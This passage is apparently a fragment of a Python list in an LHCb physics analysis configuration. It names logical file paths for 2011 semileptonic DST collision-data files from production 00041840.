'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034968_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023313_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031237_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025799_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039212_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000505_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005141_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040037_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026505_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003592_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047812_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012607_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060872_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050237_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020205_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031792_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066861_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029038_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056924_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057706_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067035_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004911_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036218_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013134_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009860_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040319_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056322_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056815_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016884_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007353_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014485_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017324_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004353_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054330_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007253_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013938_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024943_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021608_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035078_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067967_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034737_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020286_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021504_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060059_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052625_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068050_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057795_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011548_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013589_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063663_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008945_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008278_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007043_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012812_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063861_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022728_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045642_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023195_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034788_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020761_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009248_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049400_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012592_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064726_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041233_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030330_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026569_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043972_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007354_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008357_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019565_1.semileptonic.dst',
